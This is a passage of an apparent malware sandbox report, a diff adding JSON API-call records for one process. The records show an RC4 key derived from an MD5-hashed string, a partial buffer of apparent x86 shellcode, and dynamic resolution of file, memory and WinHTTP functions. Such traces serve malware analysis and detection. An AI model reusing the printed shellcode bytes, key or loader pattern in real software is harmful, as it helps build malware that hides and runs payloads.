"LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D9.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 210 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "misc", + "api": "RtlDosPathNameToNtPathName_U", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "DosFileName", + "value": "C:\\Windows\\SYSTEM32\\CRYPTSP.dll" + } + ], + "repeated": 0, + "id": 211 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000021c" + }, + { + "name": "DesiredAccess", + "value": "0x00020000", + "pretty_value": "READ_CONTROL" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\cryptsp.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 212 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000021c" + } + ], + "repeated": 0, + "id": 213 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\CRYPTSP" + }, + { + "name": "DllBase", + "value": "0x743f0000" + } + ], + "repeated": 0, + "id": 214 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\cryptsp" + }, + { + "name": "BaseAddress", + "value": "0x743f0000" + }, + { + "name": "InitRoutine", + "value": "0x743f5d30" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 215 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76315000" + }, + { + "name": "ModuleName", + "value": "ADVAPI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 216 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x76315000" + }, + { + "name": "ModuleName", + "value": "ADVAPI32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 217 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\system32\\rsaenh" + }, + { + "name": "DllBase", + "value": "0x73aa0000" + } + ], + "repeated": 0, + "id": 218 + }, + { + "timestamp": "2025-03-07 21:41:19,031", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\rsaenh.dll" + }, + { + "name": "BaseAddress", + "value": "0x73aa0000" + } + ], + "repeated": 0, + "id": 219 + }, + { + "timestamp": "2025-03-07 21:41:19,046", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "kernel32.dll" + }, + { + "name": "BaseAddress", + "value": "0x760f0000" + } + ], + "repeated": 0, + "id": 220 + }, + { + "timestamp": "2025-03-07 21:41:19,046", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\USERENV" + }, + { + "name": "DllBase", + "value": "0x74190000" + } + ], + "repeated": 0, + "id": 221 + }, + { + "timestamp": "2025-03-07 21:41:19,046", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\profapi" + }, + { + "name": "DllBase", + "value": "0x74590000" + } + ], + "repeated": 0, + "id": 222 + }, + { + "timestamp": "2025-03-07 21:41:19,046", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\bcryptprimitives.dll" + }, + { + "name": "BaseAddress", + "value": "0x76090000" + } + ], + "repeated": 0, + "id": 223 + }, + { + "timestamp": "2025-03-07 21:41:19,046", + "thread_id": "9452", + "caller": "0x0228029c", + "parentcaller": "0x00402bf9", + "category": "crypto", + "api": "CryptAcquireContextA", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "Container", + "value": "" + }, + { + "name": "Provider", + "value": "" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 224 + }, + { + "timestamp": "2025-03-07 21:41:19,046", + "thread_id": "9452", + "caller": "0x022802af", + "parentcaller": "0x00402bf9", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\rsaenh.dll" + }, + { + "name": "BaseAddress", + "value": "0x73aa0000" + } + ], + "repeated": 0, + "id": 225 + }, + { + "timestamp": "2025-03-07 21:41:19,046", + "thread_id": "9452", + "caller": "0x022802af", + "parentcaller": "0x00402bf9", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\DPAPI" + }, + { + "name": "DllBase", + "value": "0x73ad0000" + } + ], + "repeated": 0, + "id": 226 + }, + { + "timestamp": "2025-03-07 21:41:19,046", + "thread_id": "9452", + "caller": "0x022802af", + "parentcaller": "0x00402bf9", + "category": "crypto", + "api": "CryptAcquireContextA", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "Container", + "value": "" + }, + { + "name": "Provider", + "value": "" + }, + { + "name": "Flags", + "value": "0x00000008" + } + ], + "repeated": 0, + "id": 227 + }, + { + "timestamp": "2025-03-07 21:41:19,046", + "thread_id": "9452", + "caller": "0x022802e1", + "parentcaller": "0x00402bf9", + "category": "crypto", + "api": "CryptCreateHash", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "Algid", + "value": "0x00008003", + "pretty_value": "MD5" + }, + { + "name": "CryptKey", + "value": "0x00000000" + }, + { + "name": "Hash object", + "value": "0x004b3d08" + } + ], + "repeated": 0, + "id": 228 + }, + { + "timestamp": "2025-03-07 21:41:19,046", + "thread_id": "9452", + "caller": "0x022802fa", + "parentcaller": "0x00402bf9", + "category": "crypto", + "api": "CryptHashData", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptHash", + "value": "0x004b3d08" + }, + { + "name": "Buffer", + "value": "B4UV~zgiqT3@8fW7cj42?CDPtUK7ovD19c9gMYVQ4fKOB5|5AsYHesE\\x00" + }, + { + "name": "Length", + "value": "56" + } + ], + "repeated": 0, + "id": 229 + }, + { + "timestamp": "2025-03-07 21:41:19,046", + "thread_id": "9452", + "caller": "0x0228031b", + "parentcaller": "0x00402bf9", + "category": "crypto", + "api": "CryptDeriveKey", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "Algid", + "value": "0x00006801", + "pretty_value": "RC4" + }, + { + "name": "BaseData", + "value": "0x004b3d08" + }, + { + "name": "CryptKey", + "value": "0x004b3d88" + } + ], + "repeated": 0, + "id": 230 + }, + { + "timestamp": "2025-03-07 21:41:19,046", + "thread_id": "9452", + "caller": "0x0228033f", + "parentcaller": "0x00402bf9", + "category": "crypto", + "api": "CryptEncrypt", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptKey", + "value": "0x004b3d88" + }, + { + "name": "CryptHash", + "value": "0x00000000" + }, + { + "name": "Buffer", + "value": "\\xe8\\x00\\x00\\x00\\x00X\\x89\\xc3\\x05:\\x05\\x00\\x00\\x81\\xc3:\\x1f\\x00\\x00h\\x01\\x00\\x00\\x00h\\x05\\x00\\x00\\x00ShEwb0P\\xe8\\x04\\x00\\x00\\x00\\x83\\xc4\\x14\\xc3\\x83\\xecH\\x83d$\\x18\\x00\\xb9Lw&\\x07SUVW3\\xf6\\xe8\"\\x04\\x00\\x00\\xb9I\\xf7\\x02x\\x89D$\\x1c\\xe8\\x14\\x04\\x00\\x00\\xb9X\\xa4S\\xe5\\x89D$ \\xe8\\x06\\x04\\x00\\x00\\xb9\\x10\\xe1\\x8a\\xc3\\x8b\\xe8\\xe8\\xfa\\x03\\x00\\x00\\xb9\\xaf\\xb1\\\\x94\\x89D$,\\xe8\\xec\\x03\\x00\\x00\\xb93\\x00\\x9e\\x95\\x89D$0\\xe8\\xde\\x03\\x00\\x00\\x8b\\xd8\\x8bD$\\\\x8bx<\\x03\\xf8\\x89|$\\x10\\x81?PE\\x00\\x00t\\x073\\xc0\\xe9\\xb8\\x03\\x00\\x00\\xb8L\\x01\\x00\\x00f9G\\x04u\\xee\\xf6G8\\x01u\\xe8\\x0f\\xb7W\\x06\\x0f\\xb7G\\x14\\x85\\xd2t\"\\x8dO$\\x03\\xc8\\x83y\\x04\\x00\\x8b\\x01u\\x05\\x03G8\\xeb\\x03\\x03A\\x04;\\xc6\\x0fG\\xf0\\x83\\xc1(\\x83\\xea\\x01u\\xe3\\x8dD$4P\\xff\\xd3\\x8bD$8\\x8b_P\\x8dP\\xff\\x8dH\\xff\\xf7\\xd2H\\x03\\xce\\x03" + }, + { + "name": "Length", + "value": "8004" + }, + { + "name": "Final", + "value": "1" + } + ], + "repeated": 0, + "id": 231 + }, + { + "timestamp": "2025-03-07 21:41:19,046", + "thread_id": "9452", + "caller": "0x02290115", + "parentcaller": "0x00000000", + "category": "system", + "api": "GetSystemTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 1, + "id": 232 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290115", + "parentcaller": "0x02290115", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x02430000" + }, + { + "name": "RegionSize", + "value": "0x00005000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 233 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x022901ca", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "ADVAPI32.dll" + }, + { + "name": "BaseAddress", + "value": "0x762a0000" + } + ], + "repeated": 0, + "id": 234 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "ADVAPI32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x762a0000" + }, + { + "name": "FunctionName", + "value": "GetUserNameA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x762c3490" + } + ], + "repeated": 0, + "id": 235 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x022901ca", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "SHELL32.dll" + }, + { + "name": "BaseAddress", + "value": "0x75950000" + } + ], + "repeated": 0, + "id": 236 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "SHELL32.dll" + }, + { + "name": "ModuleHandle", + "value": "0x75950000" + }, + { + "name": "FunctionName", + "value": "SHGetFolderPathA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x75ac82f0" + } + ], + "repeated": 0, + "id": 237 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x022901ca", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "KERNEL32.dll" + }, + { + "name": "BaseAddress", + "value": "0x760f0000" + } + ], + "repeated": 0, + "id": 238 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "lstrcpyA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x761083c0" + } + ], + "repeated": 0, + "id": 239 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "ExitProcess" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76115940" + } + ], + "repeated": 0, + "id": 240 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "CreateDirectoryA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x761137a0" + } + ], + "repeated": 0, + "id": 241 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "lstrcatA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76108a60" + } + ], + "repeated": 0, + "id": 242 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "Sleep" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x761115a0" + } + ], + "repeated": 0, + "id": 243 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "lstrlenA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76110ae0" + } + ], + "repeated": 0, + "id": 244 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "ReadFile" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76113b60" + } + ], + "repeated": 0, + "id": 245 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "HeapFree" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7610e590" + } + ], + "repeated": 0, + "id": 246 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "WriteFile" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76113c50" + } + ], + "repeated": 0, + "id": 247 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "CreateFileA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x761137d0" + } + ], + "repeated": 0, + "id": 248 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "CloseHandle" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76113580" + } + ], + "repeated": 0, + "id": 249 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "HeapAlloc" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x77035e10" + } + ], + "repeated": 0, + "id": 250 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "GetFileSize" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76113a00" + } + ], + "repeated": 0, + "id": 251 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "GetProcessHeap" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7610f9b0" + } + ], + "repeated": 0, + "id": 252 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "GetModuleFileNameA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x761114d0" + } + ], + "repeated": 0, + "id": 253 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "VirtualProtect" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76110b60" + } + ], + "repeated": 0, + "id": 254 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "VirtualAlloc" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7610f9f0" + } + ], + "repeated": 0, + "id": 255 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "HeapReAlloc" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x77032790" + } + ], + "repeated": 0, + "id": 256 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x022901ca", + "parentcaller": "0x00000000", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\WINHTTP" + }, + { + "name": "DllBase", + "value": "0x72d80000" + } + ], + "repeated": 0, + "id": 257 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x022901ca", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "WINHTTP.dll" + }, + { + "name": "BaseAddress", + "value": "0x72d80000" + } + ], + "repeated": 0, + "id": 258 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINHTTP.dll" + }, + { + "name": "ModuleHandle", + "value": "0x72d80000" + }, + { + "name": "FunctionName", + "value": "WinHttpCloseHandle" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x72da6700" + } + ], + "repeated": 0, + "id": 259 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINHTTP.dll" + }, + { + "name": "ModuleHandle", + "value": "0x72d80000" + }, + { + "name": "FunctionName", + "value": "WinHttpSetOption" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x72da4570" + } + ], + "repeated": 0, + "id": 260 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINHTTP.dll" + }, + { + "name": "ModuleHandle", + "value": "0x72d80000" + }, + { + "name": "FunctionName", + "value": "WinHttpOpenRequest" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x72d90600" + } + ], + "repeated": 0, + "id": 261 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINHTTP.dll" + }, + { + "name": "ModuleHandle", + "value": "0x72d80000" + }, + { + "name": "FunctionName", + "value": "WinHttpSendRequest" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x72da8620" + } + ], + "repeated": 0, + "id": 262 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINHTTP.dll" + }, + { + "name": "ModuleHandle", + "value": "0x72d80000" + }, + { + "name": "FunctionName", + "value": "WinHttpQueryHeaders" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x72da3000" + } + ], + "repeated": 0, + "id": 263 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": "9452", + "caller": "0x02290213", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINHTTP.dll" + }, + { + "name": "ModuleHandle", + "value": "0x72d80000" + }, + { + "name": "FunctionName", + "value": "WinHttpOpen" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x72da2d50" + } + ], + "repeated": 0, + "id": 264 + }, + { + "timestamp": "2025-03-07 21:41:19,109", + "thread_id": 